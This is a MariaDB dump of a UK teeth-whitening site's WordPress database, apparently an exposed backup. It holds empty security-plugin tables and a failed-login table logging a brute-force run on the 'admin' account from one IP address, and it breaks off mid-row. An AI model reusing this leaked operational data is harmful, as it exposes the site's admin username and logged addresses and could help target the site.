File: //proc/thread-self/root/restore/20230201.teethwhiteningproductcouk.sql
-- MariaDB dump 10.19 Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: teethwhiteningproductcouk
-- ------------------------------------------------------
-- Server version 10.5.18-MariaDB-1:10.5.18+maria~ubu2004
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `teethwhiteningproductcouk`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `teethwhiteningproductcouk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;
USE `teethwhiteningproductcouk`;
--
-- Table structure for table `cerber_acl`
--
DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
`ip` varchar(81) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
`ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
`tag` char(1) NOT NULL,
`comments` varchar(250) NOT NULL,
`acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
`ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
`v6range` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`req_uri` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_acl`
--
LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_blocks`
--
DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`block_until` bigint(20) unsigned NOT NULL,
`reason` varchar(250) NOT NULL,
`reason_id` int(11) unsigned NOT NULL DEFAULT 0,
UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_blocks`
--
LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_countries`
--
DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
`country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
`locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
`country_name` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`country`,`locale`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_countries`
--
LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_lab`
--
DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`reason_id` int(11) unsigned NOT NULL DEFAULT 0,
`stamp` bigint(20) unsigned NOT NULL,
`details` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_lab`
--
LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_lab_ip`
--
DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`reputation` int(11) unsigned NOT NULL,
`expires` int(11) unsigned NOT NULL,
PRIMARY KEY (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_lab_ip`
--
LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_lab_net`
--
DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
`ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
`country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`expires` int(11) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`ip`),
UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_lab_net`
--
LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_log`
--
DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_login` varchar(60) NOT NULL,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`stamp` decimal(14,4) NOT NULL,
`activity` int(10) unsigned NOT NULL DEFAULT 0,
`session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`details` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
KEY `ip` (`ip`),
KEY `ip_long` (`ip_long`),
KEY `session_index` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_log`
--
LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_qmem`
--
DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`http_code` int(10) unsigned NOT NULL,
`stamp` int(10) unsigned NOT NULL,
KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_qmem`
--
LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `cerber_traffic`
--
DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
`hostname` varchar(250) NOT NULL DEFAULT '',
`uri` text NOT NULL,
`request_fields` mediumtext NOT NULL,
`request_details` mediumtext NOT NULL,
`session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`stamp` decimal(14,4) NOT NULL,
`processing` int(10) NOT NULL DEFAULT 0,
`country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`http_code` int(10) unsigned NOT NULL,
`wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`wp_type` int(10) unsigned NOT NULL DEFAULT 0,
`is_bot` int(10) unsigned NOT NULL DEFAULT 0,
`blog_id` int(10) unsigned NOT NULL DEFAULT 0,
`php_errors` text NOT NULL,
`req_status` int(10) unsigned NOT NULL DEFAULT 0,
KEY `stamp` (`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `cerber_traffic`
--
LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_events`
--
DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`event_type` varchar(150) NOT NULL DEFAULT '',
`username` varchar(150) DEFAULT NULL,
`user_id` bigint(20) DEFAULT NULL,
`event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`ip_or_host` varchar(100) DEFAULT NULL,
`referer_info` varchar(255) DEFAULT NULL,
`url` varchar(255) DEFAULT NULL,
`country_code` varchar(50) DEFAULT NULL,
`event_data` longtext DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_events`
--
LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_failed_logins`
--
DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`user_login` varchar(150) NOT NULL,
`failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1941905 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_failed_logins`
--
LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
INSERT INTO `wp_aiowps_failed_logins` VALUES (1936895,1,'admin','2023-01-25 13:07:17','85.215.165.83'),(1936896,1,'admin','2023-01-25 13:07:18','85.215.165.83'),(1936897,1,'admin','2023-01-25 13:07:19','85.215.165.83'),(1936898,1,'admin','2023-01-25 13:07:20','85.215.165.83'),(1936899,1,'admin','2023-01-25 13:07:21','85.215.165.83'),(1936900,1,'admin','2023-01-25 13:07:22','85.215.165.83'),(1936901,1,'admin','2023-01-25 13:07:23','85.215.165.83'),(1936902,1,'admin','2023-01-25 13:07:24','85.215.165.83'),(1936903,1,'admin','2023-01-25 13:07:25','85.215.165.83'),(1936904,1,'admin','2023-01-25 13:07:26','85.215.165.83'),(1936905,1,'admin','2023-01-25 13:07:27','85.215.165.83'),(1936906,1,'admin','2023-01-25 13:07:28','85.215.165.83'),(1936907,1,'admin','2023-01-25 13:07:29','85.215.165.83'),(1936908,1,'admin','2023-01-25 13:07:30','85.215.165.83'),(1936909,1,'admin','2023-01-25 13:07:31','85.215.165.83'),(1936910,1,'admin','2023-01-25 13:07:32','85.215.165.83'),(1936911,1,'admin','2023-01-25 13:07:33','85.215.165.83'),(1936912,1,'admin','2023-01-25 13:07:34','85.215.165.83'),(1936913,1,'admin','2023-01-25 13:07:35','85.215.165.83'),(1936914,1,'admin','2023-01-25 13:07:36','85.215.165.83'),(1936915,1,'admin','2023-01-25 13:07:37','85.215.165.83'),(1936916,1,'admin','2023-01-25 13:07:38','85.215.165.83'),(1936917,1,'admin','2023-01-25 13:07:39','85.215.165.83'),(1936918,1,'admin','2023-01-25 13:07:40','85.215.165.83'),(1936919,1,'admin','2023-01-25 13:07:41','85.215.165.83'),(1936920,1,'admin','2023-01-25 13:07:42','85.215.165.83'),(1936921,1,'admin','2023-01-25 13:07:43','85.215.165.83'),(1936922,1,'admin','2023-01-25 13:07:44','85.215.165.83'),(1936923,1,'admin','2023-01-25 13:07:45','85.215.165.83'),(1936924,1,'admin','2023-01-25 13:07:46','85.215.165.83'),(1936925,1,'admin','2023-01-25 13:07:47','85.215.165.83'),(1936926,1,'admin','2023-01-25 13:07:48','85.215.165.83'),(1936927,1,'admin','2023-01-25 13:07:49','85.215.165.83'),(1936928,1,'admin','2023-01-25 13:07:50','85.215.165.83'),(1936929,1,'admin','2023-01-25 13:07:51','85.215.165.83'),(1936930,1,'admin','2023-01-25 13:07:52','85.215.165.83'),(1936931,1,'admin','2023-01-25 13:07:53','85.215.165.83'),(1936932,1,'admin','2023-01-25 13:07:54','85.215.165.83'),(1936933,1,'admin','2023-01-25 13:07:55','85.215.165.83'),(1936934,1,'admin','2023-01-25 13:07:55','85.215.165.83'),(1936935,1,'admin','2023-01-25 13:07:56','85.215.165.83'),(1936936,1,'admin','2023-01-25 13:07:57','85.215.165.83'),(1936937,1,'admin','2023-01-25 13:07:58','85.215.165.83'),(1936938,1,'admin','2023-01-25 13:07:58','85.215.165.83'),(1936939,1,'admin','2023-01-25 13:07:59','85.215.165.83'),(1936940,1,'admin','2023-01-25 13:08:00','85.215.165.83'),(1936941,1,'admin','2023-01-25 13:08:01','85.215.165.83'),(1936942,1,'admin','2023-01-25 13:08:02','85.215.165.83'),(1936943,1,'admin','2023-01-25 13:08:02','85.215.165.83'),(1936944,1,'admin','2023-01-25 13:08:03','85.215.165.83'),(1936945,1,'admin','2023-01-25 13:08:04','85.215.165.83'),(1936946,1,'admin','2023-01-25 13:08:05','85.215.165.83'),(1936947,1,'admin','2023-01-25 13:08:06','85.215.165.83'),(1936948,1,'admin','2023-01-25 13:08:07','85.215.165.83'),(1936949,1,'admin','2023-01-25 13:08:08','85.215.165.83'),(1936950,1,'admin','2023-01-25 13:08:09','85.215.165.83'),(1936951,1,'admin','2023-01-25 13:08:10','85.215.165.83'),(1936952,1,'admin','2023-01-25 13:08:11','85.215.165.83'),(1936953,1,'admin','2023-01-25 13:08:11','85.215.165.83'),(1936954,1,'admin','2023-01-25 13:08:12','85.215.165.83'),(1936955,1,'admin','2023-01-25 13:08:13','85.215.165.83'),(1936956,1,'admin','2023-01-25 13:08:14','85.215.165.83'),(1936957,1,'admin','2023-01-25 13:08:15','85.215.165.83'),(1936958,1,'admin','2023-01-25 13:08:16','85.215.165.83'),(1936959,1,'admin','2023-01-25 13:08:17','85.215.165.83'),(1936960,1,'admin','2023-01-25 13:08:18','85.215.165.83'),(1936961,1,'admin','2023-01-25 13:08:19','85.215.165.83'),(1936962,1,'admin','2023-01-25 13:08:20','85.215.165.83'),(1936963,1,'admin','2023-01-25 13:08:21','85.215.165.83'),(1936964,1,'admin','2023-01-25 13:08:22','85.215.165.83'),(1936965,1,'admin','2023-01-25 13:08:23','85.215.165.83'),(1936966,1,'admin','2023-01-25 13:08:24','85.215.165.83'),(1936967,1,'admin','2023-01-25 13:08:25','85.215.165.83'),(1936968,1,'admin','2023-01-25 13:08:26','85.215.165.83'),(1936969,1,'admin','2023-01-25 13:08:27','85.215.165.83'),(1936970,1,'admin','2023-01-25 13:08:28','85.215.165.83'),(1936971,1,'admin','2023-01-25 13:08:30','85.215.165.83'),(1936972,1,'admin','2023-01-25 13:08:31','85.215.165.83'),(1936973,1,'admin','2023-01-25 13:08:32','85.215.165.83'),(1936974,1,'admin','2023-01-25 13:08:33','85.215.165.83'),(1936975,1,'admin','2023-01-25 13:08:34','85.215.165.83'),(1936976,1,'admin','2023-01-25 13:08:35','85.215.165.83'),(1936977,1,'admin','2023-01-25 13:08:36','85.215.165.83'),(1936978,1,'admin','2023-01-25 13:08:37','85.215.165.83'),(1936979,1,'admin','2023-01-25 13:08:37','85.215.165.83'),(1936980,1,'admin','2023-01-25 13:08:38','85.215.165.83'),(1936981,1,'admin','2023-01-25 13:08:39','85.215.165.83'),(1936982,1,'admin','2023-01-25 13:08:40','85.215.165.83'),(1936983,1,'admin','2023-01-25 13:08:41','85.215.165.83'),(1936984,1,'admin','2023-01-25 13:08:43','85.215.165.83'),(1936985,1,'admin','2023-01-25 13:08:43','85.215.165.83'),(1936986,1,'admin','2023-01-25 13:08:44','85.215.165.83'),(1936987,1,'admin','2023-01-25 13:08:45','85.215.165.83'),(1936988,1,'admin','2023-01-25 13:08:46','85.215.165.83'),(1936989,1,'admin','2023-01-25 13:08:47','85.215.165.83'),(1936990,1,'admin','2023-01-25 13:08:48','85.215.165.83'),(1936991,1,'admin','2023-01-25 13:08:49','85.215.165.83'),(1936992,1,'admin','2023-01-25 13:08:50','85.215.165.83'),(1936993,1,'admin','2023-01-25 13:08:51','85.215.165.83'),(1936994,1,'admin','2023-01-25 13:08:52','85.215.165.83'),(1936995,1,'admin','2023-01-25 13:08:53','85.215.165.83'),(1936996,1,'admin','2023-01-25 13:08:54','85.215.165.83'),(1936997,1,'admin','2023-01-25 13:08:55','85.215.165.83'),(1936998,1,'admin','2023-01-25 13:08:56','85.215.165.83'),(1936999,1,'admin','2023-01-25 13:08:57','85.215.165.83'),(1937000,1,'admin','2023-01-25 13:08:58','85.215.165.83'),(1937001,1,'admin','2023-01-25 13:08:59','85.215.165.83'),(1937002,1,'admin','2023-01-25 13:08:59','85.215.165.83'),(1937003,1,'admin','2023-01-25 13:09:00','85.215.165.83'),(1937004,1,'admin','2023-01-25 13:09:01','85.215.165.83'),(1937005,1,'admin','2023-01-25 13:09:02','85.215.165.83'),(1937006,1,'admin','2023-01-25 13:09:03','85.215.165.83'),(1937007,1,'admin','2023-01-25 13:09:04','85.215.165.83'),(1937008,1,'admin','2023-01-25 13:09:05','85.215.165.83'),(1937009,1,'admin','2023-01-25 13:09:06','85.215.165.83'),(1937010,1,'admin','2023-01-25 13:09:07','85.215.165.83'),(1937011,1,'admin','2023-01-25 13:09:08','85.215.165.83'),(1937012,1,'admin','2023-01-25 13:09:10','85.215.165.83'),(1937013,1,'admin','2023-01-25 13:09:10','85.215.165.83'),(1937014,1,'admin','2023-01-25 13:09:11','85.215.165.83'),(1937015,1,'admin','2023-01-25 13:09:12','85.215.165.83'),(1937016,1,'admin','2023-01-25 13:09:13','85.215.165.83'),(1937017,1,'admin','2023-01-25 13:09:14','85.215.165.83'),(1937018,1,'admin','2023-01-25 13:09:15','85.215.165.83'),(1937019,1,'admin','2023-01-25 13:09:16','85.215.165.83'),(1937020,1,'admin','2023-01-25 13:09:17','85.215.165.83'),(1937021,1,'admin','2023-01-25 13:09:18','85.215.165.83'),(1937022,1,'admin','2023-01-25 13:09:19','85.215.165.83'),(1937023,1,'admin','2023-01-25 13:09:20','85.215.165.83'),(1937024,1,'admin','2023-01-25 13:09:21','85.215.165.83'),(1937025,1,'admin','2023-01-25 13:09:22','85.215.165.83'),(1937026,1,'admin','2023-01-25 13:09:23','85.215.165.83'),(1937027,1,'admin','2023-01-25 13:09:24','85.215.165.83'),(1937028,1,'admin','2023-01-25 13:09:25','85.215.165.83'),(1937029,1,'admin','2023-01-25 13:09:26','85.215.165.83'),(1937030,1,'admin','2023-01-25 13:09:27','85.215.165.83'),(1937031,1,'admin','2023-01-25 13:09:28','85.215.165.83'),(1937032,1,'admin','2023-01-25 13:09:29','85.215.165.83'),(1937033,1,'admin','2023-01-25 13:09:30','85.215.165.83'),(1937034,1,'admin','2023-01-25 13:09:31','85.215.165.83'),(1937035,1,'admin','2023-01-25 13:09:32','85.215.165.83'),(1937036,1,'admin','2023-01-25 13:09:33','85.215.165.83'),(1937037,1,'admin','2023-01-25 13:09:34','85.215.165.83'),(1937038,1,'admin','2023-01-25 13:09:35','85.215.165.83'),(1937039,1,'admin','2023-01-25 13:09:36','85.215.165.83'),(1937040,1,'admin','2023-01-25 13:09:37','85.215.165.83'),(1937041,1,'admin','2023-01-25 13:09:38','85.215.165.83'),(1937042,1,'admin','2023-01-25 13:09:39','85.215.165.83'),(1937043,1,'admin','2023-01-25 13:09:40','85.215.165.83'),(1937044,1,'admin','2023-01-25 13:09:41','85.215.165.83'),(1937045,1,'admin','2023-01-25 13:09:42','85.215.165.83'),(1937046,1,'admin','2023-01-25 13:09:42','85.215.165.83'),(1937047,1,'admin','2023-01-25 13:09:43','85.215.165.83'),(1937048,1,'admin','2023-01-25 13:09:45','85.215.165.83'),(1937049,1,'admin','2023-01-25 13:09:45','85.215.165.83'),(1937050,1,'admin','2023-01-25 13:09:46','85.215.165.83'),(1937051,1,'admin','2023-01-25 13:09:47','85.215.165.83'),(1937052,1,'admin','2023-01-25 13:09:48','85.215.165.83'),(1937053,1,'admin','2023-01-25 13:09:49','85.215.165.83'),(1937054,1,'admin','2023-01-25 13:09:50','85.215.165.83'),(1937055,1,'admin','2023-01-25 13:09:51','85.215.165.83'),(1937056,1,'admin','2023-01-25 13:09:52','85.215.165.83'),(1937057,1,'admin','2023-01-25 13:09:53','85.215.165.83'),(1937058,1,'admin','2023-01-25 13:09:53','85.215.165.83'),(1937059,1,'admin','2023-01-25 13:09:54','85.215.165.83'),(1937060,1,'admin','2023-01-25 13:09:55','85.215.165.83'),(1937061,1,'admin','2023-01-25 13:09:56','85.215.165.83'),(1937062,1,'admin','2023-01-25 13:09:57','85.215.165.83'),(1937063,1,'admin','2023-01-25 13:09:58','85.215.165.83'),(1937064,1,'admin','2023-01-25 13:09:59','85.215.165.83'),(1937065,1,'admin','2023-01-25 13:10:00','85.215.165.83'),(1937066,1,'admin','2023-01-25 13:10:01','85.215.165.83'),(1937067,1,'admin','2023-01-25 13:10:02','85.215.165.83'),(1937068,1,'admin','2023-01-25 13:10:03','85.215.165.83'),(1937069,1,'admin','2023-01-25 13:10:04','85.215.165.83'),(1937070,1,'admin','2023-01-25 13:10:05','85.215.165.83'),(1937071,1,'admin','2023-01-25 13:10:06','85.215.165.83'),(1937072,1,'admin','2023-01-25 13:10:07','85.215.165.83'),(1937073,1,'admin','2023-01-25 13:10:08','85.215.165.83'),(1937074,1,'admin','2023-01-25 13:10:09','85.215.165.83'),(1937075,1,'admin','2023-01-25 13:10:09','85.215.165.83'),(1937076,1,'admin','2023-01-25 13:10:10','85.215.165.83'),(1937077,1,'admin','2023-01-25 13:10:11','85.215.165.83'),(1937078,1,'admin','2023-01-25 13:10:12','85.215.165.83'),(1937079,1,'admin','2023-01-25 13:10:12','85.215.165.83'),(1937080,1,'admin','2023-01-25 13:10:13','85.215.165.83'),(1937081,1,'admin','2023-01-25 13:10:14','85.215.165.83'),(1937082,1,'admin','2023-01-25 13:10:15','85.215.165.83'),(1937083,1,'admin','2023-01-25 13:10:16','85.215.165.83'),(1937084,1,'admin','2023-01-25 13:10:17','85.215.165.83'),(1937085,1,'admin','2023-01-25 13:10:18','85.215.165.83'),(1937086,1,'admin','2023-01-25 13:10:19','85.215.165.83'),(1937087,1,'admin','2023-01-25 13:10:19','85.215.165.83'),(1937088,1,'admin','2023-01-25 13:10:20','85.215.165.83'),(1937089,1,'admin','2023-01-25 13:10:21','85.215.165.83'),(1937090,1,'admin','2023-01-25 13:10:22','85.215.165.83'),(1937091,1,'admin','2023-01-25 13:10:23','85.215.165.83'),(1937092,1,'admin','2023-01-25 13:10:24','85.215.165.83'),(1937093,1,'admin','2023-01-25 13:10:24','85.215.165.83'),(1937094,1,'admin','2023-01-25 13:10:25','85.215.165.83'),(1937095,1,'admin','2023-01-25 13:10:26','85.215.165.83'),(1937096,1,'admin','2023-01-25 13:10:27','85.215.165.83'),(1937097,1,'admin','2023-01-25 13:10:28','85.215.165.83'),(1937098,1,'admin','2023-01-25 13:10:29','85.215.165.83'),(1937099,1,'admin','2023-01-25 13:10:30','85.215.165.83'),(1937100,1,'admin','2023-01-25 13:10:31','85.215.165.83'),(1937101,1,'admin','2023-01-25 13:10:32','85.215.165.83'),(1937102,1,'admin','2023-01-25 13:10:33','85.215.165.83'),(1937103,1,'admin','2023-01-25 13:10:34','85.215.165.83'),(1937104,1,'admin','2023-01-25 13:10:35','85.215.165.83'),(1937105,1,'admin','2023-01-25 13:10:36','85.215.165.83'),(1937106,1,'admin','2023-01-25 13:10:38','85.215.165.83'),(1937107,1,'admin','2023-01-25 13:10:38','85.215.165.83'),(1937108,1,'admin','2023-01-25 13:10:40','85.215.165.83'),(1937109,1,'admin','2023-01-25 13:10:40','85.215.165.83'),(1937110,1,'admin','2023-01-25 13:10:41','85.215.165.83'),(1937111,1,'admin','2023-01-25 13:10:42','85.215.165.83'),(1937112,1,'admin','2023-01-25 13:10:43','85.215.165.83'),(1937113,1,'admin','2023-01-25 13:10:44','85.215.165.83'),(1937114,1,'admin','2023-01-25 13:10:45','85.215.165.83'),(1937115,1,'admin','2023-01-25 13:10:46','85.215.165.83'),(1937116,1,'admin','2023-01-25 13:10:47','85.215.165.83'),(1937117,1,'admin','2023-01-25 13:10:48','85.215.165.83'),(1937118,1,'admin','2023-01-25 13:10:49','85.215.165.83'),(1937119,1,'admin','2023-01-25 13:10:50','85.215.165.83'),(1937120,1,'admin','2023-01-25 13:10:50','85.215.165.83'),(1937121,1,'admin','2023-01-25 13:10:51','85.215.165.83'),(1937122,1,'admin','2023-01-25 13:10:52','85.215.165.83'),(1937123,1,'admin','2023-01-25 13:10:53','85.215.165.83'),(1937124,1,'admin','2023-01-25 13:10:54','85.215.165.83'),(1937125,1,'admin','2023-01-25 13:10:55','85.215.165.83'),(1937126,1,'admin','2023-01-25 13:10:56','85.215.165.83'),(1937127,1,'admin','2023-01-25 13:10:57','85.215.165.83'),(1937128,1,'admin','2023-01-25 13:10:58','85.215.165.83'),(1937129,1,'admin','2023-01-25 13:10:58','85.215.165.83'),(1937130,1,'admin','2023-01-25 13:11:00','85.215.165.83'),(1937131,1,'admin','2023-01-25 13:11:00','85.215.165.83'),(1937132,1,'admin','2023-01-25 13:11:01','85.215.165.83'),(1937133,1,'admin','2023-01-25 13:11:02','85.215.165.83'),(1937134,1,'admin','2023-01-25 13:11:03','85.215.165.83'),(1937135,1,'admin','2023-01-25 13:11:04','85.215.165.83'),(1937136,1,'admin','2023-01-25 13:11:05','85.215.165.83'),(1937137,1,'admin','2023-01-25 13:11:06','85.215.165.83'),(1937138,1,'admin','2023-01-25 13:11:07','85.215.165.83'),(1937139,1,'admin','2023-01-25 13:11:07','85.215.165.83'),(1937140,1,'admin','2023-01-25 13:11:08','85.215.165.83'),(1937141,1,'admin','2023-01-25 13:11:09','85.215.165.83'),(1937142,1,'admin','2023-01-25 13:11:10','85.215.165.83'),(1937143,1,'admin','2023-01-25 13:11:11','85.215.165.83'),(1937144,1,'admin','2023-01-25 13:11:12','85.215.165.83'),(1937145,1,'admin','2023-01-25 